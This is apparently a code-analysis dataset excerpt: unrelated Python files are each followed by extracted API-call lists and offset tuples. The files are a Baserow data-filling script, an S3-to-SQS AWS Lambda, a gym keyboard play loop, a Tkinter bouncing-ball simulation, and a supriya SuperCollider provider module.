field_object["field"], fake, cache
)
for field_id, field_object in model._field_objects.items()
}
values, manytomany_values = row_handler.extract_manytomany_values(values, model)
order += Decimal("1")
values["order"] = order
# Insert the row with the randomly created values.
instance = model.objects.create(**values)
# Changes the set of the manytomany values.
for field_name, value in manytomany_values.items():
if value and len(value) > 0:
getattr(instance, field_name).set(value)
def create_a_column_for_every_type(table):
field_handler = FieldHandler()
all_kwargs_per_type = construct_all_possible_field_kwargs(None, None, None)
for field_type_name, all_possible_kwargs in all_kwargs_per_type.items():
if field_type_name == "link_row":
continue
i = 0
for kwargs in all_possible_kwargs:
i = i + 1
field_handler.create_field(
table.database.group.users.first(), table, field_type_name, **kwargs
)
|
[
"django.db.models.Max",
"baserow.contrib.database.fields.handler.FieldHandler",
"faker.Faker",
"decimal.Decimal",
"baserow.contrib.database.table.models.Table.objects.get",
"baserow.contrib.database.fields.field_helpers.construct_all_possible_field_kwargs",
"baserow.contrib.database.rows.handler.RowHandler",
"sys.exit"
] |
[((1680, 1687), 'faker.Faker', 'Faker', ([], {}), '()\n', (1685, 1687), False, 'from faker import Faker\n'), ((1706, 1718), 'baserow.contrib.database.rows.handler.RowHandler', 'RowHandler', ([], {}), '()\n', (1716, 1718), False, 'from baserow.contrib.database.rows.handler import RowHandler\n'), ((2932, 2946), 'baserow.contrib.database.fields.handler.FieldHandler', 'FieldHandler', ([], {}), '()\n', (2944, 2946), False, 'from baserow.contrib.database.fields.handler import FieldHandler\n'), ((2973, 3026), 'baserow.contrib.database.fields.field_helpers.construct_all_possible_field_kwargs', 'construct_all_possible_field_kwargs', (['None', 'None', 'None'], {}), '(None, None, None)\n', (3008, 3026), False, 'from baserow.contrib.database.fields.field_helpers import construct_all_possible_field_kwargs\n'), ((2501, 2513), 'decimal.Decimal', 'Decimal', (['"""1"""'], {}), "('1')\n", (2508, 2513), False, 'from decimal import Decimal\n'), ((1255, 1285), 'baserow.contrib.database.table.models.Table.objects.get', 'Table.objects.get', ([], {'pk': 'table_id'}), '(pk=table_id)\n', (1272, 1285), False, 'from baserow.contrib.database.table.models import Table\n'), ((1984, 1996), 'decimal.Decimal', 'Decimal', (['"""0"""'], {}), "('0')\n", (1991, 1996), False, 'from decimal import Decimal\n'), ((1463, 1474), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1471, 1474), False, 'import sys\n'), ((1956, 1968), 'django.db.models.Max', 'Max', (['"""order"""'], {}), "('order')\n", (1959, 1968), False, 'from django.db.models import Max\n')]
|
import json,boto3,os,logging
from botocore.exceptions import ClientError
logger = logging.getLogger("AKAM:S3-NS-SYNC")
def configure_logging():
logger.setLevel(logging.DEBUG)
# Format for our loglines
formatter = logging.Formatter("%(name)s - %(levelname)s - %(message)s")
# Setup console logging
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
ch.setFormatter(formatter)
logger.addHandler(ch)
def addToQueue(record):
"""
Description: add processed event to SQS Queue for processing
Links:
https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/sqs.html#SQS.Client.send_message
Expects:
record
Returns: Bool on success or failure
"""
sqs = boto3.client('sqs')
try:
response = sqs.send_message(
QueueUrl= os.environ['queueUrl'],
DelaySeconds=0,
MessageBody=(json.dumps(record)),
MessageGroupId='S3-NS-SYNC'
)
logger.info ("Record added to queue: {0}".format(record))
except Exception as e:
logger.error ("Error adding record '{0}' to queue: {1}".format(record,e))
return False
return True
def lambda_handler(event, context):
configure_logging()
statusCode = 200
record_lst = []
logger.info ("Events {0} received.".format(len(event['Records'])))
for record in event['Records']:
new_record = {
'eventName':record['eventName'],
'bucket':record['s3']['bucket']['name'],
'key':record['s3']['object']['key'],
'etag':record['s3']['object']['eTag'],
'sequencer':record['s3']['object']['sequencer']
}
record_lst.append(new_record)
if addToQueue(record_lst) is False:
statusCode = 500
if len(record_lst) == 0:
statusCode = 500
if statusCode == 500:
return {
'statusCode': statusCode,
'body': 'Error, {0}/{1} added to queue!'.format(len(record_lst),len(event['Records']))
}
return {
'statusCode': statusCode,
'body': 'Success, {0}/{1} Added to queue!'.format(len(record_lst),len(event['Records']))
}
|
[
"boto3.client",
"logging.StreamHandler",
"json.dumps",
"logging.Formatter",
"logging.getLogger"
] |
[((83, 119), 'logging.getLogger', 'logging.getLogger', (['"""AKAM:S3-NS-SYNC"""'], {}), "('AKAM:S3-NS-SYNC')\n", (100, 119), False, 'import json, boto3, os, logging\n'), ((227, 286), 'logging.Formatter', 'logging.Formatter', (['"""%(name)s - %(levelname)s - %(message)s"""'], {}), "('%(name)s - %(levelname)s - %(message)s')\n", (244, 286), False, 'import json, boto3, os, logging\n'), ((324, 347), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (345, 347), False, 'import json, boto3, os, logging\n'), ((747, 766), 'boto3.client', 'boto3.client', (['"""sqs"""'], {}), "('sqs')\n", (759, 766), False, 'import json, boto3, os, logging\n'), ((918, 936), 'json.dumps', 'json.dumps', (['record'], {}), '(record)\n', (928, 936), False, 'import json, boto3, os, logging\n')]
|
import gym
#import pygame
import sys
import time
import matplotlib
import time
import pygame
import pybullet as p
from gibson.core.render.profiler import Profiler
'''
try:
matplotlib.use('GTK3Agg')
import matplotlib.pyplot as plt
except Exception:
pass
'''
#import pyglet.window as pw
from collections import deque
#from pygame.locals import HWSURFACE, DOUBLEBUF, RESIZABLE, VIDEORESIZE
from threading import Thread
def display_arr(screen, arr, video_size, transpose):
arr_min, arr_max = arr.min(), arr.max()
arr = 255.0 * (arr - arr_min) / (arr_max - arr_min)
pyg_img = pygame.surfarray.make_surface(arr.swapaxes(0, 1) if transpose else arr)
pyg_img = pygame.transform.scale(pyg_img, video_size)
screen.blit(pyg_img, (0,0))
def play(env, transpose=True, zoom=None, callback=None, keys_to_action=None):
"""Allows one to play the game using keyboard.
To simply play the game use:
play(gym.make("Pong-v3"))
play(env)
Above code works also if env is wrapped, so it's particularly useful in
verifying that the frame-level preprocessing does not render the game
unplayable.
If you wish to plot real time statistics as you play, you can use
gym.utils.play.PlayPlot. Here's a sample code for plotting the reward
for last 5 second of gameplay.
def callback(obs_t, obs_tp1, rew, done, info):
return [rew,]
env_plotter = EnvPlotter(callback, 30 * 5, ["reward"])
env = gym.make("Pong-v3")
play(env, callback=env_plotter.callback)
Arguments
---------
env: gym.Env
Environment to use for playing.
transpose: bool
If True the output of observation is transposed.
Defaults to true.
zoom: float
Make screen edge this many times bigger
callback: lambda or None
Callback if a callback is provided it will be executed after
every step. It takes the following input:
obs_t: observation before performing action
obs_tp1: observation after performing action
action: action that was executed
rew: reward that was received
done: whether the environemnt is done or not
info: debug info
keys_to_action: dict: tuple(int) -> int or None
Mapping from keys pressed to action performed.
For example if pressed 'w' and space at the same time is supposed
to trigger action number 2 then key_to_action dict would look like this:
{
# ...
sorted(ord('w'), ord(' ')) -> 2
# ...
}
If None, default key_to_action mapping for that env is used, if provided.
"""
obs_s = env.observation_space
#assert type(obs_s) == gym.spaces.box.Box
#assert len(obs_s.shape) == 2 or (len(obs_s.shape) == 3 and obs_s.shape[2] in [1,3])
if keys_to_action is None:
if hasattr(env, 'get_keys_to_action'):
keys_to_action = env.get_keys_to_action()
elif hasattr(env.unwrapped, 'get_keys_to_action'):
keys_to_action = env.unwrapped.get_keys_to_action()
relevant_keys = set(sum(map(list, keys_to_action.keys()),[]))
pressed_keys = []
running = True
env_done = True
record_num = 0
record_total = 0
obs = env.reset()
do_restart = False
last_keys = [] ## Prevent overacting
while running:
print('robot xyz {} rpy {}'.format(env.get_robot_xyz(), env.robot.get_rpy()))
# print("obs", obs)
if do_restart:
do_restart = False
env.reset()
pressed_keys = []
continue
if len(pressed_keys) == 0:
action = keys_to_action[()]
# obs, rew, env_done, info = env.step(action)
# env.step(4)
# with Profiler("Play Env: step"):
# start = time.time()
# obs, rew, env_done, info = env.step(action)
# record_total += time.time() - start
# record_num += 1
# print(info['sensor'])
# print("Play mode: reward %f" % rew)
for p_key in pressed_keys:
action = keys_to_action[(p_key, )]
prev_obs = obs
obs, rew, env_done, info = env.step(action)
# with Profiler("Play Env: step"):
# start = time.time()
# obs, rew, env_done, info = env.step(action)
# record_total += time.time() - start
# record_num += 1
# print("Play mode: reward %f" % rew)
# print('obs: {}'.format(obs))
if callback is not None:
callback(prev_obs, obs, action, rew, env_done, info)
# process pygame events
key_codes = env.get_key_pressed(relevant_keys)
#print("Key codes", key_codes)
pressed_keys = []
for key in key_codes:
if key == ord('r') and key not in last_keys:
do_restart = True
if key == ord('j') and key not in last_keys:
env.robot.turn_left()
if key == ord('l') and key not in last_keys:
env.robot.turn_right()
if key == ord('i') and key not in last_keys:
env.robot.move_forward()
if key == ord('k') and key not in last_keys:
env.robot.move_backward()
if key not in relevant_keys:
continue
pressed_keys.append(key)
last_keys = key_codes
class PlayPlot(object):
def __init__(self, callback, horizon_timesteps, plot_names):
self.data_callback = callback
self.horizon_timesteps = horizon_timesteps
self.plot_names = plot_names
num_plots = len(self.plot_names)
self.fig, self.ax = plt.subplots(num_plots)
if num_plots == 1:
self.ax = [self.ax]
for axis, name in zip(self.ax, plot_names):
axis.set_title(name)
self.t = 0
self.cur_plot = [None for _ in range(num_plots)]
self.data = [deque(maxlen=horizon_timesteps) for _ in range(num_plots)]
def callback(self, obs_t, obs_tp1, action, rew, done, info):
points = self.data_callback(obs_t, obs_tp1, action, rew, done, info)
for point, data_series in zip(points, self.data):
data_series.append(point)
self.t += 1
xmin, xmax = max(0, self.t - self.horizon_timesteps), self.t
for i, plot in enumerate(self.cur_plot):
if plot is not None:
plot.remove()
self.cur_plot[i] = self.ax[i].scatter(range(xmin, xmax), list(self.data[i]))
self.ax[i].set_xlim(xmin, xmax)
plt.pause(0.000001)
|
[
"pygame.transform.scale",
"collections.deque"
] |
[((684, 727), 'pygame.transform.scale', 'pygame.transform.scale', (['pyg_img', 'video_size'], {}), '(pyg_img, video_size)\n', (706, 727), False, 'import pygame\n'), ((6118, 6149), 'collections.deque', 'deque', ([], {'maxlen': 'horizon_timesteps'}), '(maxlen=horizon_timesteps)\n', (6123, 6149), False, 'from collections import deque\n')]
|
import json
class Corpus(object):
def __init__(self, weighted_bigrams={}, occurrences={}):
self.weighted_bigrams = weighted_bigrams
self.occurrences = occurrences
@classmethod
def load(cls, path):
with open(path, 'r') as f:
data = f.read()
return cls(**json.loads(data))
def __eq__(self, other):
return self.weighted_bigrams == other.weighted_bigrams and self.occurrences == other.occurrences
def save(self, path):
saved_corpus = {
'weighted_bigrams': self.weighted_bigrams,
'occurrences': self.occurrences
}
with open(path, 'w') as f:
f.write(json.dumps(saved_corpus))
|
[
"json.loads",
"json.dumps"
] |
[((313, 329), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (323, 329), False, 'import json\n'), ((683, 707), 'json.dumps', 'json.dumps', (['saved_corpus'], {}), '(saved_corpus)\n', (693, 707), False, 'import json\n')]
|
"""
<NAME>
University of Massachusetts, Amherst
28 June 2019
Project 3
ECE 122
"""
from Mapping_for_Tkinter import Mapping_for_Tkinter
from tkinter import *
import math
import time
class Ball:
def __init__(self, x0, y0, v, theta, radius):
self.__x = x0
self.__y = y0
self.__v = v
self.__theta = theta
self.__radius = radius
def get_x(self):
return self.__x
def get_y(self):
return self.__y
def get_v(self):
return self.__v
def get_theta(self):
return self.__theta
def get_radius(self):
return self.__radius
def set_x(self, x):
self.__x = x
def set_y(self, y):
self.__y = y
def set_v(self, v):
self.__v = v
def set_theta(self, theta):
self.__theta = theta
class Frame:
def __init__(self, ball, mapping, canvas):
self.__ball = ball
self.__mapping = mapping
self.__canvas = canvas
self.__rebounds = 0
self.__last_pos = None
self.__circle = self.init_draw("blue")
def init_draw(self, color):
x = self.__ball.get_x()
y = self.__ball.get_y()
r = self.__ball.get_radius()
i = self.__mapping.get_i(x)
j = self.__mapping.get_j(y)
return self.__canvas.create_oval(i-r, j-r, i+r, j+r, fill=color)
def update_position(self):
v = self.__ball.get_v()
x = self.__ball.get_x()
y = self.__ball.get_y()
theta = self.__ball.get_theta()
self.__last_pos = (x, y)
if x > self.__mapping.get_xmax() or x < self.__mapping.get_xmin():
# ball has reached left or right side of frame; bounce (change angle)
theta = math.pi - theta
self.__rebounds += 1
if y > self.__mapping.get_ymax() or y < self.__mapping.get_ymin():
# ball has reached top or bottom of frame
theta = -theta
self.__rebounds += 1
self.__ball.set_theta(theta)
# Updates (x,y) coords based on given formulae
x += v * math.cos(theta)
y += v * math.sin(theta)
# Sets updated (x,y) coords
self.__ball.set_x(x)
self.__ball.set_y(y)
def update_canvas(self):
# move the ball
x = self.__ball.get_x()
y = self.__ball.get_y()
r = self.__ball.get_radius()
i = self.__mapping.get_i(x)
j = self.__mapping.get_j(y)
self.__canvas.coords(self.__circle, (i-r, j-r, i+r, j+r))
# draw the trail
i = self.__mapping.get_i(self.__last_pos[0])
j = self.__mapping.get_j(self.__last_pos[1])
self.__canvas.create_oval(i, j, i, j, fill='black')
def get_rebounds(self):
return self.__rebounds
def main():
coord_in = input("Enter xmin,xmax,ymin,ymax (return for default -300,300,-300,300): ")
info_in = input("Enter x0,y0,v,theta (return for default 0,0,70,30): ")
# Takes user input as type str, separates desired values, and assigns to variables
if coord_in == "":
xmin, xmax, ymin, ymax = -300, 300, -300, 300
else:
xmin, xmax, ymin, ymax = map(float, coord_in.split())
if info_in == "":
x, y, v, theta = 0, 0, 70, (30 * math.pi / 180)
else:
info = info_in.split()
info = [float(x) for x in info]
x, y, v, theta = info[0], info[1], info[2], (info[3] * math.pi / 180)
t_total = 0
radius = 4
width = 800
ball = Ball(x, y, v * .1, theta, radius)
m = Mapping_for_Tkinter(xmin, xmax, ymin, ymax, width)
window = Tk()
canvas = Canvas(window, width=m.get_width(), height=m.get_height(), bg="white")
canvas.pack()
frame = Frame(ball, m, canvas)
while t_total < 150:
time.sleep(.01)
frame.update_position()
frame.update_canvas()
window.update()
t_total += .1
frame.init_draw("red") # Draw red ball at simulation end
print("Total number of rebounds is: %s" % frame.get_rebounds())
window.mainloop()
if __name__ == "__main__":
main()
|
[
"Mapping_for_Tkinter.Mapping_for_Tkinter",
"math.cos",
"math.sin",
"time.sleep"
] |
[((3534, 3584), 'Mapping_for_Tkinter.Mapping_for_Tkinter', 'Mapping_for_Tkinter', (['xmin', 'xmax', 'ymin', 'ymax', 'width'], {}), '(xmin, xmax, ymin, ymax, width)\n', (3553, 3584), False, 'from Mapping_for_Tkinter import Mapping_for_Tkinter\n'), ((3776, 3792), 'time.sleep', 'time.sleep', (['(0.01)'], {}), '(0.01)\n', (3786, 3792), False, 'import time\n'), ((2087, 2102), 'math.cos', 'math.cos', (['theta'], {}), '(theta)\n', (2095, 2102), False, 'import math\n'), ((2120, 2135), 'math.sin', 'math.sin', (['theta'], {}), '(theta)\n', (2128, 2135), False, 'import math\n')]
|
import abc
import collections
import contextlib
import dataclasses
import pathlib
import re
import tempfile
from types import MappingProxyType
from typing import (
Any,
Callable,
Dict,
List,
Mapping,
Optional,
Sequence,
Tuple,
Type,
Union,
cast,
)
from uqbar.objects import new
import supriya.nonrealtime # noqa
import supriya.realtime # noqa
from supriya import commands, nonrealtime, realtime
from supriya.assets.synthdefs.default import default
from supriya.enums import AddAction, CalculationRate, ParameterRate
from supriya.nonrealtime import Session
from supriya.realtime import AsyncServer, BaseServer, Server
from supriya.synthdefs import SynthDef
# with provider.at(): proxy = provider.add_buffer(file_path=file_path)
# with provider.at(): proxy.free()
@dataclasses.dataclass(frozen=True)
class Proxy:
provider: "Provider"
@dataclasses.dataclass(frozen=True)
class BufferProxy:
provider: "Provider"
identifier: Union["supriya.nonrealtime.Buffer", int]
channel_count: Optional[int] = None
frame_count: Optional[int] = None
file_path: Optional[str] = None
starting_frame: Optional[int] = None
def __float__(self):
return float(int(self))
def __int__(self):
if self.provider.server:
return self.identifier
elif self.provider.session:
return self.provider.identifier.session_id
def close(self):
pass
def free(self):
self.provider.free_buffer(self)
def normalize(self, new_maximum=1.0):
pass
def read(self, file_path, leave_open=False):
pass
def write(
self,
file_path,
frame_count=None,
header_format="aiff",
leave_open=False,
sample_format="int24",
starting_frame=None,
):
pass
def as_allocate_request(self):
kwargs = dict(buffer_id=int(self), frame_count=self.frame_count)
if self.file_path is None:
return commands.BufferAllocateRequest(
**kwargs, channel_count=self.channel_count
)
kwargs.update(file_path=self.file_path, starting_frame=self.starting_frame)
if self.channel_count is None:
return commands.BufferAllocateReadRequest(**kwargs)
return commands.BufferAllocateReadChannelRequest(
**kwargs, channel_indices=list(range(self.channel_count))
)
def as_free_request(self):
return commands.BufferFreeRequest(buffer_id=int(self))
@dataclasses.dataclass(frozen=True)
class OscCallbackProxy(Proxy):
provider: "Provider"
identifier: Any
def unregister(self):
self.provider.unregister_osc_callback(self)
@dataclasses.dataclass(frozen=True)
class BusProxy(Proxy):
calculation_rate: CalculationRate
provider: "Provider"
identifier: Union["supriya.nonrealtime.Bus", int]
def __float__(self):
return float(int(self))
def __int__(self):
if self.provider.server:
return self.identifier
elif self.provider.session:
return self.provider.identifier.session_id
def set_(self, value):
self.provider.set_bus(self, value)
def free(self):
self.provider.free_bus(self)
@property
def map_symbol(self):
if self.calculation_rate == CalculationRate.AUDIO:
return f"a{int(self)}"
return f"c{int(self)}"
@dataclasses.dataclass(frozen=True)
class BusGroupProxy(Proxy):
calculation_rate: CalculationRate
channel_count: int
identifier: Union["supriya.nonrealtime.BusGroup", int]
provider: "Provider"
buses: Sequence["BusProxy"] = dataclasses.field(init=False)
def __post_init__(self):
if isinstance(self.identifier, int):
bus_identifiers = range(
self.identifier, self.identifier + self.channel_count
)
else:
bus_identifiers = self.identifier[:]
object.__setattr__(
self,
"buses",
tuple(
BusProxy(
calculation_rate=self.calculation_rate,
provider=self.provider,
identifier=bus_identifier,
)
for bus_identifier in bus_identifiers
),
)
def __float__(self):
return float(int(self))
def __getitem__(self, item):
return self.buses[item]
def __int__(self):
if self.provider.server:
return self.identifier
elif self.provider.session:
return self.provider.identifier.session_id
def __len__(self):
return self.channel_count
def free(self):
self.provider.free_bus_group(self)
@dataclasses.dataclass(frozen=True)
class NodeProxy(Proxy):
identifier: Union["supriya.nonrealtime.Node", int]
provider: "Provider"
def __float__(self):
return float(int(self))
def __int__(self):
if self.provider.server:
return self.identifier
elif self.provider.session:
return self.provider.identifier.session_id
def __setitem__(self, key, value):
self.provider.set_node(self, **{key: value})
def add_group(
self, *, add_action: int = AddAction.ADD_TO_HEAD, name: Optional[str] = None
) -> "GroupProxy":
return self.provider.add_group(add_action=add_action, target_node=self)
def add_synth(
self,
*,
synthdef: SynthDef = None,
add_action: int = AddAction.ADD_TO_HEAD,
name: Optional[str] = None,
**settings,
) -> "SynthProxy":
return self.provider.add_synth(
add_action=add_action, synthdef=synthdef, target_node=self, **settings
)
def as_move_request(
self, add_action: AddAction, target_node: "NodeProxy"
) -> commands.MoveRequest:
request_classes: Dict[int, Type[commands.MoveRequest]] = {
AddAction.ADD_TO_HEAD: commands.GroupHeadRequest,
AddAction.ADD_TO_TAIL: commands.GroupTailRequest,
AddAction.ADD_BEFORE: commands.NodeBeforeRequest,
AddAction.ADD_AFTER: commands.NodeAfterRequest,
}
request_class: Type[commands.MoveRequest] = request_classes[add_action]
return request_class(
node_id_pairs=[request_class.NodeIdPair(int(self), int(target_node))]
)
def as_set_request(self, **settings):
coerced_settings = {}
for key, value in settings.items():
if isinstance(value, (BusProxy, BusGroupProxy)):
if value.calculation_rate == CalculationRate.AUDIO:
value = f"a{value.identifier}"
else:
value = f"c{value.identifier}"
coerced_settings[key] = value
return commands.NodeSetRequest(node_id=int(self), **coerced_settings)
def dispose(self):
self.provider.dispose(self)
def free(self):
self.provider.free_node(self)
def move(self, add_action: AddAction, target_node: "NodeProxy"):
self.provider.move_node(self, add_action, target_node)
@dataclasses.dataclass(frozen=True)
class GroupProxy(NodeProxy):
identifier: Union["supriya.nonrealtime.Node", int]
provider: "Provider"
def as_add_request(self, add_action, target_node):
return commands.GroupNewRequest(
items=[
commands.GroupNewRequest.Item(
node_id=int(self.identifier),
add_action=add_action,
target_node_id=int(target_node),
)
]
)
def as_free_request(self, force=False):
return commands.NodeFreeRequest(node_ids=[int(self)])
@dataclasses.dataclass(frozen=True)
class SynthProxy(NodeProxy):
identifier: Union["supriya.nonrealtime.Node", int]
provider: "Provider"
synthdef: SynthDef
settings: Dict[str, Union[float, BusGroupProxy]]
def as_add_request(self, add_action, target_node):
# TODO: Handle map symbols
# If arg is a bus proxy, and synth param is scalar, cast to int
# Elif arg is a bus proxy, and synth param not scalar, map
# Else cast to float
synthdef = self.synthdef or default
synthdef_kwargs = {}
for _, parameter in synthdef.indexed_parameters:
if parameter.name not in self.settings:
continue
value = self.settings[parameter.name]
if value == parameter.value:
continue
if parameter.parameter_rate == ParameterRate.SCALAR:
synthdef_kwargs[parameter.name] = float(value)
elif parameter.name in ("in_", "out"):
synthdef_kwargs[parameter.name] = float(value)
elif isinstance(value, (BusProxy, BusGroupProxy)):
synthdef_kwargs[parameter.name] = value.map_symbol
else:
synthdef_kwargs[parameter.name] = float(value)
return commands.SynthNewRequest(
node_id=int(self.identifier),
add_action=add_action,
target_node_id=int(target_node),
synthdef=synthdef,
**synthdef_kwargs,
)
def as_free_request(self, force=False):
if force or "gate" not in self.synthdef.parameters:
return commands.NodeFreeRequest(node_ids=[int(self)])
return commands.NodeSetRequest(node_id=int(self), gate=0)
@dataclasses.dataclass(frozen=True)
class ProviderMoment:
provider: "Provider"
seconds: float
bus_settings: List[Tuple[BusProxy, float]] = dataclasses.field(default_factory=list)
buffer_additions: List[BufferProxy] = dataclasses.field(default_factory=list)
buffer_removals: List[BufferProxy] = dataclasses.field(default_factory=list)
node_reorderings: List[Tuple[NodeProxy, AddAction, NodeProxy]] = dataclasses.field(
default_factory=list
)
node_additions: List[Tuple[NodeProxy, AddAction, NodeProxy]] = dataclasses.field(
default_factory=list
)
node_removals: List[NodeProxy] = dataclasses.field(default_factory=list)
node_settings: List[
Tuple[NodeProxy, Dict[str, Union[float, BusGroupProxy]]]
] = dataclasses.field(default_factory=list)
wait: bool = dataclasses.field(default=False)
exit_stack: contextlib.ExitStack = dataclasses.field(
init=False, default_factory=contextlib.ExitStack, compare=False
)
def __postinit__(self):
self.exit_stack = contextlib.ExitStack()
async def __aenter__(self):
if self.provider.server and not isinstance(self.provider.server, AsyncServer):
raise RuntimeError(repr(self.provider.server))
return self._enter()
async def __aexit__(self, *args):
results = self._exit()
if not results:
return
timestamp, request_bundle, synthdefs = results
server = self.provider.server
# The underlying asyncio UDP transport will silently drop oversize packets
if len(request_bundle.to_datagram()) <= 8192:
if self.wait:
# If waiting, the original ProviderMoment timestamp can be ignored
await request_bundle.communicate_async(server=server, sync=True)
else:
server.send(request_bundle.to_osc())
else:
# If over the UDP packet limit, partition the message
requests = request_bundle.contents
# Always wait for SynthDefs to load.
if synthdefs:
synthdef_request = requests[0]
requests = synthdef_request.callback.contents or []
synthdef_request = new(synthdef_request, callback=None)
await synthdef_request.communicate_async(sync=True, server=server)
if self.wait:
# If waiting, the original ProviderMoment timestamp can be ignored
for bundle in commands.RequestBundle.partition(requests):
await bundle.communicate_async(server=server, sync=True)
else:
for bundle in commands.RequestBundle.partition(
requests, timestamp=timestamp
):
server.send(bundle.to_osc())
def __enter__(self):
if self.provider.session is not None:
self.exit_stack.enter_context(self.provider.session.at(self.seconds or 0))
if self.provider.server and not isinstance(self.provider.server, Server):
raise RuntimeError(repr(self.provider.server))
return self._enter()
def __exit__(self, *args):
results = self._exit()
if not results:
return
timestamp, request_bundle, synthdefs = results
try:
self.provider.server.send(request_bundle.to_osc())
except OSError:
requests = request_bundle.contents
if synthdefs:
synthdef_request = requests[0]
requests = synthdef_request.callback.contents or []
synthdef_request = new(synthdef_request, callback=None)
synthdef_request.communicate(sync=True, server=self.provider.server)
for bundle in commands.RequestBundle.partition(
requests, timestamp=timestamp
):
self.provider.server.send(bundle.to_osc())
def _enter(self):
self.provider._moments.append(self)
self.provider._counter[self.seconds] += 1
return self
def _exit(self):
self.exit_stack.close()
self.provider._moments.pop()
self.provider._counter[self.seconds] -= 1
if not self.provider.server:
return
elif self.provider._counter[self.seconds]:
return
requests = []
synthdefs = set()
new_nodes = set()
for buffer_proxy in self.buffer_additions:
requests.append(buffer_proxy.as_allocate_request())
for node_proxy, add_action, target_node in self.node_additions:
request = node_proxy.as_add_request(add_action, target_node)
if isinstance(request, commands.SynthNewRequest):
if request.synthdef not in self.provider.server:
synthdefs.add(request.synthdef)
requests.append(request)
new_nodes.add(node_proxy.identifier)
for node_proxy, add_action, target_node in self.node_reorderings:
requests.append(node_proxy.as_move_request(add_action, target_node))
for node_proxy, settings in self.node_settings:
requests.append(node_proxy.as_set_request(**settings))
for node_proxy in self.node_removals:
requests.append(
node_proxy.as_free_request(force=node_proxy.identifier in new_nodes)
)
for buffer_proxy in self.buffer_removals:
requests.append(buffer_proxy.as_free_request())
if self.bus_settings:
sorted_pairs = sorted(
dict(
(int(bus_proxy.identifier), value)
for bus_proxy, value in self.bus_settings
).items()
)
request = commands.ControlBusSetRequest(index_value_pairs=sorted_pairs)
requests.append(request)
if not requests:
return
timestamp = self.seconds
if timestamp is not None:
timestamp += self.provider._latency
if synthdefs:
request_bundle = commands.RequestBundle(
timestamp=timestamp,
contents=[
commands.SynthDefReceiveRequest(
synthdefs=sorted(synthdefs, key=lambda x: x.actual_name),
callback=commands.RequestBundle(contents=requests),
)
],
)
# check bundle size, write synthdefs to disk and do /d_load
if len(request_bundle.to_datagram(with_placeholders=True)) > 8192:
directory_path = pathlib.Path(tempfile.mkdtemp())
# directory_path = pathlib.Path("~/Desktop").expanduser()
for synthdef in synthdefs:
name = synthdef.anonymous_name
if synthdef.name:
name += "-" + re.sub(r"[^\w]", "-", synthdef.name)
file_name = "{}.scsyndef".format(name)
synthdef_path = directory_path / file_name
synthdef_path.write_bytes(synthdef.compile())
request_bundle = commands.RequestBundle(
timestamp=timestamp,
contents=[
supriya.commands.SynthDefLoadDirectoryRequest(
directory_path=directory_path,
callback=commands.RequestBundle(contents=requests),
)
],
)
else:
request_bundle = commands.RequestBundle(
timestamp=timestamp, contents=requests
)
for synthdef in synthdefs:
synthdef._register_with_local_server(server=self.provider.server)
return timestamp, request_bundle, synthdefs
class Provider(metaclass=abc.ABCMeta):
"""
Provides limited realtime/non-realtime compatibility layer.
"""
### INITIALIZER ###
def __init__(self, latency=0.1):
self._moments: List[ProviderMoment] = []
self._counter = collections.Counter()
self._server = None
self._session = None
self._latency = latency
self._annotation_map: Dict[Union["supriya.nonrealtime.Node", int], str] = {}
### PUBLIC METHODS ###
@abc.abstractmethod
def add_buffer(
self,
*,
channel_count: Optional[int] = None,
file_path: Optional[str] = None,
frame_count: Optional[int] = None,
starting_frame: Optional[int] = None,
) -> BufferProxy:
raise NotImplementedError
@abc.abstractmethod
def add_bus(self, calculation_rate=CalculationRate.CONTROL) -> BusProxy:
raise NotImplementedError
@abc.abstractmethod
def add_bus_group(
self, channel_count=1, calculation_rate=CalculationRate.CONTROL
) -> BusGroupProxy:
raise NotImplementedError
@abc.abstractmethod
def add_group(
self,
*,
target_node=None,
add_action=AddAction.ADD_TO_HEAD,
name: Optional[str] = None,
) -> GroupProxy:
raise NotImplementedError
@abc.abstractmethod
def add_synth(
self,
*,
synthdef: SynthDef = None,
target_node=None,
add_action=AddAction.ADD_TO_HEAD,
name: Optional[str] = None,
**settings,
) -> SynthProxy:
raise NotImplementedError
@abc.abstractmethod
def boot(self, **kwargs):
raise NotImplementedError
@abc.abstractmethod
def dispose(self, node_proxy: NodeProxy):
raise NotImplementedError
@abc.abstractmethod
def free_buffer(self, buffer_proxy):
raise NotImplementedError
@abc.abstractmethod
def free_bus(self, bus_proxy: BusProxy):
raise NotImplementedError
@abc.abstractmethod
def free_bus_group(self, bus_group_proxy: BusGroupProxy):
raise NotImplementedError
@abc.abstractmethod
def free_node(self, node_proxy: NodeProxy):
raise NotImplementedError
@abc.abstractmethod
def move_node(
self, node_proxy: NodeProxy, add_action: AddAction, target_node: NodeProxy
):
raise NotImplementedError
@abc.abstractmethod
def set_bus(self, bus_proxy: BusProxy, value: float):
raise NotImplementedError
@abc.abstractmethod
def set_node(self, node_proxy: NodeProxy, **settings):
raise NotImplementedError
def at(self, seconds=None, wait=False):
if self._moments and self._moments[-1].seconds == seconds:
provider_moment = self._moments[-1]
else:
provider_moment = ProviderMoment(provider=self, seconds=seconds, wait=wait)
return provider_moment
@classmethod
def from_context(cls, context, latency=0.1) -> "Provider":
if isinstance(context, Session):
return NonrealtimeProvider(context, latency=latency)
elif isinstance(context, BaseServer):
return RealtimeProvider(context, latency=latency)
raise ValueError("Unknown context")
@classmethod
def nonrealtime(cls) -> "NonrealtimeProvider":
session = Session()
return cast("NonrealtimeProvider", cls.from_context(session))
@abc.abstractmethod
def quit(self):
raise NotImplementedError
@classmethod
def realtime(
cls, scsynth_path=None, options=None, port=None, **kwargs
) -> "RealtimeProvider":
server = Server()
server.boot(port=port, scsynth_path=scsynth_path, options=options, **kwargs)
return cast("RealtimeProvider", cls.from_context(server))
@classmethod
async def realtime_async(
cls, scsynth_path=None, options=None, port=None, **kwargs
) -> "RealtimeProvider":
server = AsyncServer()
await server.boot(
port=port, scsynth_path=scsynth_path, options=options, **kwargs
)
return cast("RealtimeProvider", cls.from_context(server))
@abc.abstractmethod
def register_osc_callback(
self, pattern: Tuple[Union[str, float], ...], procedure: Callable
) -> OscCallbackProxy:
raise NotImplementedError
@abc.abstractmethod
def unregister_osc_callback(self, proxy: OscCallbackProxy):
raise NotImplementedError
### PUBLIC PROPERTIES ###
@property
def annotation_map(self) -> Mapping[Union["supriya.nonrealtime.Node", int], str]:
